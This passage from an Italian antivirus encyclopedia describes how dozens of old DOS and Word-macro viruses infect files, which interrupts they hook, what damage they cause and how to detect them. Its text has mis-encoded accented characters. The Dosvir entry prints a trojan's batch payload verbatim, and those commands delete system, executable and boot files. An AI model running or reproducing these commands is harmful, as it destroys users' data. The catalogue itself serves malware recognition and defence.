Virus: Virus da file. Lunghezza del Virus: N/A. Descrizione: Questo virus infetta i documenti di MSWORD. Quando viene aperto un documento infetto, il virus si installa aggiungendo alcune macro all'ambiente di WORD. Il virus attiva una macro chiamata PayLoad che cancella i file di sistema del DOS il giorno 5 aprile. Una volta che il virus Φ attivo, tutti i documenti salvati usando il comando "Salva con nome..." vengono infettati. Occasionalmente i documenti stampati avranno le seguenti due righe di testo aggiunte: "And finally I would like to say: STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC" Il virus pu≥ cercare di inserire il file del virus di DOS "Ph33r" nel sistema. [Wit Code] Nome del Virus: WITCODE. Pseudonimo: Nessuno. Tipo di Virus: Virus da file. Lunghezza del Virus: 965/975 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Una volta in memoria infetta ogni file pulito eseguito. Danni: Nessuno. Metodo di rilevazione: Fa aumentare la misura dei file infetti di 965/975 Byte. Note: 1) Residente in memoria. 2) Appare un messaggio d'errore se c'Φ un errore di I/O (come per esempio protetto da scrittura). [XQR-B] Nome del Virus: XQR-B. Tipo di Virus: Virus da file (infetta i file con estensione *.COM ed *.EXE). Infetta la tabella delle partizioni. Lunghezza del Virus: Nessun cambiamento. Vettore PC agganciato: INT 21h, INT 24h, INT 13h, INT 8h. Procedura eseguita: 1) Quando si esegue un file infetto, il virus infetta il Settore #1. 2) Controlla che sia residente in memoria. Se "NO", si carica in memoria intercettando l'INT 21h, INT 8h, e l'INT 13h. 3) Se la data di sistema Φ il 4 maggio, il virus mostra questo messaggio: " XQR: Wherever, I love you Forever and ever! The beautiful memoria for ours in that summer time has been recorded in Computer history . Bon voyage, My dear XQR! " 4) Infetta tutti i file non infetti eseguiti. Danni: Il virus cambia la configurazione della tastiera ogni domenica. Metodo di rilevazione: Controllare che la tastiera lavori correttamente. Note: 1) Intercetta l'INT 24h quando infetta i file. Omette gli errori di I/O (come per esempio protetto da scrittura). [Yonyu] Nome del Virus: YONYU. Tipo di Virus: Virus del settore di boot e di partizione. Lunghezza del Virus: Nessuno. Vettore PC agganciato: INT 13h. Procedura eseguita: 1) Il virus diminuisce, di 1K Byte, la memoria totale quando il sistema Φ avviato con un disco infetto. 2) Si carica nell'ultimo 1K Byte della memoria. 3) Intercetta l'INT 13h. 4) Infetta il dischetto. Danni: Nessuno. Metodo di rilevazione: Diminuisce la memoria totale di 1K Byte. Note: Non intercetta l'INT 24h quando infetta i file. Omette gli errori di I/O (come per esempio protetto da scrittura). [Gorlovka] Nome del Virus: Gorlovka. Tipo di Virus: Residente in memoria, Virus da file (infetta i file con estensione *.COM ed *.EXE). Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia in memoria. Se "SI", il virus mostra il seguente messaggio : "Tracing mode has been destroyed." Altrimenti si carica nella memoria alta. 2) Intercetta l'INT 21h e mostra questo messaggio: "Tracing mode has been destroyed." Metodo di infezione: Intercetta l'INT 21H(AH=4Bh). Prima blocca l'INT 24h per evitare di lasciare tracce mentre scrive, poi controlla che il programma da eseguire sia un file non infetto con estensione *.COM o *.EXE. Se "SI", lo infetta. Infine, il virus ripristina l'INT 24h. Danni: Il virus sovrascrive il file originale con il codice del virus, questo lo corrompe. Note: La misura dei file infetti non varia. Metodo di rilevazione: Ricerca del messaggio sopra riportato. [Akuku-649] Nome del Virus: Akuku-649. Tipo di Virus: Virus da file (Infetta i file con estensione *.COM). Lunghezza del Virus: 649 Byte. Procedura eseguita: 1) Cerca i tutti i file non infetti con estensione *.COM nella cartella in uso (non infetta lo stesso file due volte) e lo infetta. 2) Controlla che l'anno della data di sistema sia successivo al 1994, che il mese ed il giorno siano successivi a 6 e l'ora di sistema sia successiva alle ore 15:00. In caso coincidano tutte queste varianti, il virus mostra il seguente messaggio : "A kuku frajerze." Danni: Nessuno. Note: 1) Non residente in memoria. 2) Prima di infettare i file, aggancia l'INT 24h per non lasciare tracce mentre scrive. Metodo di rilevazione: I file infetti aumentano di 649 Byte. [Cossiga] Nome del Virus: Cossiga. Tipo di Virus: Virus da file (Infetta i file con estensione *.EXE). Procedura eseguita: 1) Cerca i file non infetti con estensione *.EXE nella cartella in uso e li infetta (infetta un solo file alla volta). 2) Controlla che la data di sistema sia sucessiva al 10/17/1991. Se "SI", il virus mostra il seguente messaggio : "COSSIGA ?! NO GRAZZIE ! By Amissi dee Panoce (c) 1991 " Danni: Sovrascrive il file originale e lo corrompe. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando sovrascrive perchΘ l'INT 24h non Φ stato agganciato. [DOS Vir] Nome del Virus: Dosvir. Tipo di Virus: Cavallo di Troia. Lunghezza del Virus: 3.004 Byte. Procedura eseguita: 1) Il virus crea un file batch con i seguenti comandi: CLS echo Cracked by Cracking Kr .e 20 2 echo Loading game. .Please Wait.... c: CD\ DEL autoexec.bat DEL *.exe DEL *.com DEL *.exe DEL *.com DEL *.sys ATTRIB..-r ibmbio.com ATTRIB..-r ibmdos.com ATTRIB..-r ibmbio.sys ATTRIB..-r ibmdos.sys DEL ibmbio.com DEL ibmdos.com DEL ibmbio.sys DEL ibmdos.sys CD\bbs DEL *.exe DEL *.com CD\dos DEL *.exe DEL *.com d: CD\ DEL autoexec.bat DEL *.exe DEL *.com CD\dos DEL *.exe DEL *.com CD\bbs DEL *.exe DEL *.com CLS 2) Esegue il file batch. [Deranged] Nome del Virus: Deranged. Tipo di Virus: Virus da file (Infetta i file con estensione *.EXE). Lunghezza del Virus: 419 Byte. Procedura eseguita: 1) Cerca i file non infetti con estensione *.EXE nella cartella in uso e li infetta. Danni: Nessuno. Note: 1) Dato che la procedura del virus non Φ stata scritta correttamente, il sistema si blocca quando viene eseguito un file infetto. 2) Non residente in memoria. 3) Appare un messaggio d'errore quando sovrascrive perchΘ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 419 Byte. [James] Nome del Virus: James. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 356 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica nella memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: Intercetta l'INT 21H (AH=4Bh) per infettare i file. Dapprima intercetta l'INT 24h per evitare di lasciare tracce quando scrive poi controlla che il programma da eseguire sia un file non infetto con estensione *.COM. Se "SI", il virus lo infetta. Infine ripristina l'INT 24h. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 356 Byte. [Abraxas-3] Nome del Virus: Abraxas-3. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Lunghezza del Virus: 1.200 Byte. Procedura eseguita: 1) Il virus suona la canzone "Do Re Mi Fa So La Si Do Re......". 2) Mostra il messaggio: "abraxas" Con caratteri ingranditi. 3) Cerca i file non infetti con estensione *.EXE nella cartella in uso e li infetta. (Infetta un solo file alla volta). Il metodo di infezione Φ il seguente: Crea un file con lo stesso nome del file originale di 1.200 Byte. Danni: Il virus sovrascrive il file originale con il codice del virus, questo lo dannggia. Metodo di rilevazione: La lunghezza del file infetto Φ di 1.200 Byte. [Wolfman] Nome del Virus: Wolf-Man. Tipo di Virus: In memoria, Virus da file. (Infetta i file con estensione *.EXE e *.COM). Lunghezza del Virus: 2.064 Byte. Vettore PC agganciato: INT 09h, INT 10h, INT 16h, INT 21h. Procedura eseguita: 1) Controlla che rimanga residente in memoria. Se "NO", si carica in memoria. 2) Controlla che la data di sistema sia il giorno 15. Se "SI", il virus si manifesta. Altrimenti intercetta l'INT 09H, INT 10H, INT 16H, e l'INT 21H, quindi torna alla procedura originale. Metodo di infezione: 1) Intercetta l'INT 21H per infettare i file. Controlla che il programma da eseguire sia un file infettabile (eccetto il COMMAND.COM) e lo infetta (la lunghezza del file infettabile deve essere superire a 1.400 Byte). 2) Intercetta l'INT 9h e l'INT 10h per controllare un cambiamento del programma. Se c'Φ stato, il virus si manifesta. Sintomi: Mostra un messaggio. Sovrascrive il dischetto in uso con il codice del virus finchΦ non c'Φ pi∙ spazio libero. Aspetta 30 secondi e riavvia il sistema. Danni: Distrugge tutti i dati nel dischetto in uso. Note: 1) La procedura per mostrare il messaggio Φ stata scritta per la scheda Hercules. Quindi il sistema si blocca se il virus Φ eseguito con una scheda video a colori. Questo pu≥ prevenire la distruzione dei dati sull'hard disk. 2) Il virus contine il seguente testo : "WOLFMAN". Metodo di rilevazione: 1) I file infetti aumentano di 143 Byte. 2) Usa MEM.EXE per controllare che il programa eseguito rimanga residente in memoria (occupa circa 65.6K Byte). [Cuban] Nome del Virus: Cuban. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 1.501 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. 3) Controlla che la data di sistema sia il giorno 30. Se "SI", il virus distrugge tutti i dati sull'hard disk. Metodo di infezione: 1) Intercetta l'INT 21H (AH=4Bh) per infettare i file. Prima intercetta l'INT 24h per evitare di lasciare tracce mentre scrive. Se il programma da eseguire Φ un file pulito con estensione *.COM , il virus lo infetta direttamente. Se il programma da eseguire Φ un file con estensione *.EXE, cerca un file con estensione *.COM libero e lo infetta 2) Ripristina l'INT 24h. Danni: A volte il virus distrugge tutti i dati sull'hard disk. Metodo di rilevazione: I file infetti aumentano di 1.501 Byte. [Darkend] Nome del Virus: Darkend. Tipo di Virus: Virus da file (Infetta i file con estensione *.EXE). Lunghezza del Virus: 1.188 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. 3) Controlla che la data di sistema sia il giorno 15 Ottobre. Se "SI", il virus distrugge tutti i dati sull'hard disk. Metodo di infezione: 1) Intercetta l'INT 21H (AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file non infetto con estensione *.EXE, il virus lo infetta direttamente. Danni: A volte il virus distrugge tutti i dati sull'hard disk. Metodo di rilevazione: I file infetti aumentano di 1.188 Byte. [Story-A] Nome del Virus: Story-A. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 1.117 Byte. Vettore PC agganciato: INT 08h. Procedura eseguita: 1) Cerca tre file non infetti con estensione *.COM (escludendo COMMAND.COM) nella directory principale e in tutte le sottodirectory e le infetta (non infetta lo stesso file due volte). 2) Memorizza i file infettati. 3) Controlla che il numero dei file infettati sia superire a 7 o che la data di sistema sia il giorno 9 Luglio. Con una di queste due condizioni il virus Φ attivo. Sintomi: Non esegue la procedura di infezione, rimane in memoria. Poi intercetta l'INT 08h. Dopo 290, compare ripetutamente un messaggio (cicli di 22 secondi) in modalitα inversa. Note: Data ed ora di sistema non vengono cambiati. Metodo di rilevazione: 1) Memoria: a) La memoria complessiva del sistema diminuisce. b) Il virus pu≥ essere attivato se i primi 4 Byte del segmento sono sonosoFFh, 26h, 04h e 01h. 2) File: a) I file infetti aumentano di 1.117 Byte. b) I primi 4 Byte dell'infezione sono FFh, 26h, 04h e 01h. [Story-B] Nome del Virus: Story-B. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 1.168 Byte. Vettore PC agganciato: INT 08h. Procedura eseguita: 1) Cerca tre file non infetti con estensione *.COM (escluso il COMMAND.COM) nella directory principale e tutte le sottodirectory, e le infetta (non infetta due volte lo stesso file). 2) Memorizza il numero di file infettati. 3) Controlla che la somma dei file infetti sia maggiore di 7 o che il mese della data di sistema sia dicembre. Se Φ presente una di queste due condizioni il virus si attiva. Sintomi: Non esegue la procedura di infezione, rimane in memoria. Quindi intercetta l'INT 08h. Dopo 290, compare ripetutamente un messaggio (cicli di 22 secondi) in modalitα inversa. Note: Data ed ora di sistema non vengono cambiate. Metodo di rilevazione: 1) Memoria: a) La memoria complessiva del sistema diminuisce. b) Il virus pu≥ essere attivato se i primi 4 Byte del segmento sono FFh, 26h, 04h e 01h. 2) File: a) I file infetti aumentano di 1.168 Byte. b) I primi 4 Byte dell'infezione sono FFh, 26h, 04h e 01h. [MS DOS 3.0] Nome del Virus: Ms-Dos3.0. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 953 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e ritorna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H (AH=3Dh,AX=4B00h) per infettare i file. Se il programma, aperto od eseguito, Φ un file non infetto con estensione *.COM (eccetto COMMAND.COM) e la sua lunghezza non Φ superiore a FB00h, il virus lo infetta. Il metodo di infezione Φ il seguente: scrive un totale di 35Dh Byte (1Ch Byte per la testa, primo 3B9h Byte del file) alla fine del file, poi sovrascrive il primo 3B9h Byte con il codice del virus. Se il programma aperto od eseguito Φ un file pulito con estensione *.EXE, il virus lo infetta. In questo caso il metodo di infezione Φ il seguente: scrive un totale di 35Dh Byte (1Ch Byte per la testa, primo 3B9h Byte del file) alla fine del file, poi sovrascrive il primo 3B9h Byte con il codice del virus: dopo aver occupato il Byte a sinstra del segmento, aggiunge un totale di 3F1h Byte [codice del virus (3B9h)+dati del file originale(1Ch)+header del file(1Ch)] alla fine del file, quindi cambia l'indicatore per indicare la procedura del virus. Danni: Nessuno. Note: 1) Data ed ora di sistema non vengono cambiate. 2) Virus tipo Stealth: ripristina le informazioni del file infetto mentre Φ residente in memoria. Metodo di rilevazione: 1) Memoria: a) La memoria complessiva del sistema diminuisce di 7A0h Byte. b) La memoria pu≥ essere infettata se AX=9051h [AX Φ riportato al suo valore quando l'INT 21h(AH=B3h) viene chimato]. 2) File: a) I file infetti con estensione *.COM aumentano di 500 Byte. b) I file infetti con estensione *.EXE aumentano di 1.009-1.024 Byte. c) Utilizzare DEBUG per caricare il file infetto. [Evilgen] Nome del Virus: Evilgen. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE e *.COM). Lunghezza del Virus: 955 Byte (Versione 1.1), 963 Byte (Versione 2.0). Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e l'INT 09h e torna alla funzione originale. 3) Controlla che il giorno corrente sia 24 e che venga premuto il tasto "Del". In questo caso il virus si attiva. Metodo di infezione: 1) Intercetta l'INT 21H(AX=4B00h) per infettare i file. Se il programma da eseguire Φ un file non infetto con estensione *.EXE o *.COM , il virus lo infetta. 2) Intercetta l'INT 09h per controllare che venga premuto il tasto "Del". Sintomi: Seleziona un Settore sul drive C, quindi formatta il Settore iniziando da Testina 0, traccia 0 fino a testina 0, traccia 20h. Danni: Il virus alcune volte distrugge i dati sul drive C. Note: 1) Data ed ora di sistema non vengono cambiate. 2) Mentre Φ residente in memoria, digitando " Dir" non compare la variazione di lunghezza dei file infetti. Metodo di rilevazione: 1) Memoria: a) La memoria complessiva del sistema diminuisce. b) Il COMMAND.COM della directory principale di C viene infettato se BX=9051h [BX Φ riportato al suo valore se viene chiamato l'INT 21h (AX=7BCDh)]. c) L'indicatore dell'INT 21h e dell'INT 09h sono gli stessi. 2) File: I file infetti aumentano di 955 Byte (Versione 1.1) o 963 Byte (Versione 2.0.). Questi cambiamenti sono solo apparenti se il virus non Φ residente in memoria. [Decide-2] Nome del Virus: Decide-2. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 1.335 Byte. Procedura eseguita: 1) Cerca i file non infetti con estensione *.COM nella cartella in uso, quindi li infetta. (Infetta un solo file alla volta). 2) Controlla che la data di sistema sia settembre od ottobre e che il giorno sia compreso tra i giorni 3 e 18. Se "SI", il virus mostra quanto segue: "As the good times of DECIDE will be remembered, I started to make a new virus. You are not facing the dark tombs of "Morgoth". Humble regards to : Pazuzu, Kingu, Absu Mummu Tiamat, Baxaxaxa Baxaxaxa, Yog Sothoth Iak Sakkath, Kutulu, Humwawa Xaztur, Hubbur Shub Niggurath. Also my lovely regards go to Stephanie, the only one who makes my heart beat stronger. Want to make love with a Moribid Angel? Glenn greets ya. Press a key to start the program..." Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 1.335 Byte. [ED] Nome del Virus: Ed. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE e *.COM). Lunghezza del Virus: 775-785 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta intercettando l'INT 21h. 2) Intercetta l'INT 21h e torna alla funzione originale.. Metodo di infezione: Intercetta l'INT 21H(AH=4Bh) per infettare i file. Prima aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φ un file non infetto con estensione *.COM o *.EXE, il virus lo infetta. Danni: C'Φ un flag nella procedura del virus (ogni file infetto ha un flag diverso). Il flag diminuisce di 1 ogni volta che il virus infetta un nuovo file. Quando il flag diventa zero, il virus distrugge tutti i dati sull'hard disk. Metodo di rilevazione: I file infetti aumentano di 775-785 Byte. [Dima] Nome del Virus: Dima. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 1.024 Byte. Vettore PC agganciato: INT 24h. Procedura eseguita: Cerca tutti i file puliti con estensione *.COM ed *.EXE in tutte le directory e le infetta. Intercetta l'INT 24H per evitare di lasciare tracce mentre scrive. Metodo di rilevazione: I file infetti aumentano di 1.024 Byte. [Digger] Nome del Virus: Digger. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 1.472-1.482 Byte. Procedura eseguita: Cerca i file non infetti con estensione *.COM ed *.EXE nella cartella in uso, quindi li infetta (non reinfetta). Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΘ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 1.472-1.482 Byte. [FVHS] Nome del Virus: Fvhs. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Procedura eseguita: Cerca i file non infetti con estensione *.COM ed *.EXE nella directory corrente ed in quelle parenti, quindi li infetta. Infetta tre file alla volta. Danni: Sovrascrive il file originale con il proprio codice, corrompendo cos∞ il file. Note: 1) Non rimane in memoria. 2) Appare un messaggio d'errore quando scrive perche l'INT 24h non Φ stato agganciato. [Egg] Nome del Virus: Egg. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Lunghezza del Virus: 1.000-1.005Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per evitare di lasciare traccie quando scrive. In caso il programma da infettare sia un file pulito con estensione *.EXE, il virus lo infetta. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 1.000-1.005 Byte. [Freddy] Nome del Virus: Freddy. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 1.870-1.880 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file pulito con estensione *.COM o *.EXE, il virus lo infetta. Il virus alcune volte cerca simultaneamente altri file puliti da infettare. Danni: Nessuno. Note: Appare un messaggio d'errore quando scrive perche l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 1.870-1.880 Byte. [Ninja] Nome del Virus: Ninja. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 1.511 o 1.466 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. 3) Controlla che la data di sistema sia 1992, che sia il giorno 13 alle ore 13:00. Se ci sono queste condizioni, il virus distrugge tutti i dati sull'hard disk. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file non infetto con estensione *.EXE o *.COM, il virus lo infetta. Danni: A volte il virus distrugge tutti i dati sull'hard disk. Metodo di rilevazione: I file infetti aumentano di 1.511 o 1.466 Byte. [Yan-2505A] Nome del Virus: Yan2505a. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 2.505 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e ritorna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φ un file non infetto con estensione *.COM o *.EXE, il virus lo infetta. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 2.505 Byte. [Suicide] Nome del Virus: Suicide. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 2.048 Byte. Procedura eseguita: Cerca i file non infetti con estensione *.COM e con estensione *.EXE nella directory corrente e li infetta. Infetta quattro file alla volta. Danni: Nessuno. Note: 1) Non rimane in memoria. 2) Appare un messaggio d'errore quando scrive perche l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 2.048 Byte. [4915] Nome del Virus: 4915. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Procedura eseguita: Cerca tutti i file non infetti con estensione *.EXE nella cartella in uso in A, quindi li infetta. Danni: Sovrascrive il file originale con il codice del virus, questo corrompe i file. Note: 1) Non rimane in memoria. 2) Appare un messaggio d'errore quando scrive perche l'INT 24h non Φ stato agganciato. 3) Questo virus fu scritto usando un linguaggio di programmazione avanzato. [MSJ] Nome del Virus: Msj. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 15.395 Byte. Procedura eseguita: Cerca i file non infetti con estensione *.EXE nella cartella in uso in A, B o C, quini li infetta. Infetta solo un file alla volta. Danni: Nessuno. Note: 1) Non rimane in memoria. 2) Appare un messaggio d'errore quando scrive perche l'INT 24h non Φ stato agganciato. 2) Questo virus fu scritto usando un linguaggio di programmazione avanzato. Metodo di rilevazione: I file infetti aumentano di 15.395 Byte. [Pa-5220] Nome del Virus: Pa-5220. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Procedura eseguita: Cerca i file non infetti con estensione *.COM ed *.EXE nella cartella in uso in A, B o C, quindi lo infetta. Infetta solo un file alla volta. Danni: Sovrascrive il file originale con il codice del virus, questo corrompe i file. Note: 1) Non rimane in memoria. 2) Appare un messaggio d'errore quando scrive perche l'INT 24h non Φ stato agganciato. 3) Questo virus fu scritto usando un linguaggio di programmazione avanzato. [PCBB-11] Nome del Virus: Pcbb11. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 3.052 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φ un file non infetto con estensione *.COM o *.EXE, il virus lo infetta. Metodo di rilevazione: I file infetti aumentano di 3.052 Byte. [Bow] Nome del Virus: Bow. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 5856 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file non infetto con estensione *.COM o *.EXE, il virus lo infetta. Danni: Nessuno. Note: 1) Appare un messaggio d'errore quando scrive perche l'INT 24h non Φ stato agganciato. 2) Questo virus fu scritto usando un linguaggio di programmazione avanzato. Metodo di rilevazione: I file infetti aumentano di 5.856 Byte. [PCBB-3072] Nome del Virus: Pcbb3072. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 3.072 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φ un file non infetto con estensione *.COM o *.EXE, il virus lo infetta. Metodo di rilevazione: I file infetti aumentano di 3.072 Byte. [Terminal] Nome del Virus: Terminal. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Procedura eseguita: Cerca i file non infetti con estensione *.EXE nella directory in uso in C, quindi li infetta. Danni: Sovrascrive il file originale con il codice del virus, questo corrompe i file. Note: 1) Non rimane in memoria. 2) Appare un messaggio d'errore quando scrive perche l'INT 24h non Φ stato agganciato. 3) Questo virus fu scritto usando un linguaggio di programmazione avanzato. 4) Questo programma Φ cifrato da un programma come PKLITE. Sebbene abbia un pattern, non siamo in grado di rilevarlo. [Lanc] Nome del Virus: Lanc. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Lunghezza del Virus: 7.376 Byte. Procedura eseguita: 1) Cerca i file non infetti con estensione *.EXE nella cartella in uso. 2) Crea un nuovo file con estensione *.COM con lo stesso nome del file originale di estensione *.EXE. Questo nuovo file con estensione *.COM contiene il virus. Danni: Nessuno. Note: 1) Non rimane in memoria. 2) Appare un messaggio d'errore quando scrive perche l'INT 24h non Φ stato agganciato. 3) Questo virus fu scritto usando un linguaggio di programmazione avanzato. Metodo di rilevazione: Controllare che la lunghezza del file sia 7.376 Byte. [Nazi-Phobia] Nome del Virus: Nazi-Phobia. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Procedura eseguita: Cerca un file non infetto con estensione *.EXE nella directory in uso, quindi lo infetta. Infetta solo un file alla volta. Danni: Sovrascrive il file originale con il codice del virus, questo corrompe i file. Note: 1) Non rimane in memoria. 2) Appare un messaggio d'errore quando scrive perche l'INT 24h non Φ stato agganciato. 3) Questo virus fu scritto usando un linguaggio di programmazione avanzato. [Animus] Nome del Virus: Animus. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 7.360 o 7.392 Byte. Procedura eseguita: Cerca i file non infetti con estensione *.COM ed *.EXE nella directory in uso, quindi li infetta. Infetta solo due o tre file alla volta. Danni: Nessuno. Note: 1) Non rimane in memoria. 2) Appare un messaggio d'errore quando scrive perche l'INT 24h non Φ stato agganciato. 3) Questo virus fu scritto usando un linguaggio di programmazione avanzato. Metodo di rilevazione: I file infetti aumentano di 7.360 o 7.392 Byte. [Hitler] Nome del Virus: Hitler. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 4.808 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φ un file non infetto con estensione *.COM, il virus lo infetta. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 4.808 Byte. [Hellwean-1182] Nome del Virus: Hellwean1182. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 1.182 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φ un file non infetto con estensione *.COM o *.EXE, il virus lo infetta. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 1.182 Byte. [Minsk-GH] Nome del Virus: Minsk-Gh. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 1.450-1.490 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φ un file non infetto con estensione *.COM o *.EXE, il virus lo infetta. Danni: Nessuno. Note: Questo virus non gira con DOS 5.0. Metodo di rilevazione: I file infetti aumentano di 1.450-1.490 Byte. [LV] Nome del Virus: Lv. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta 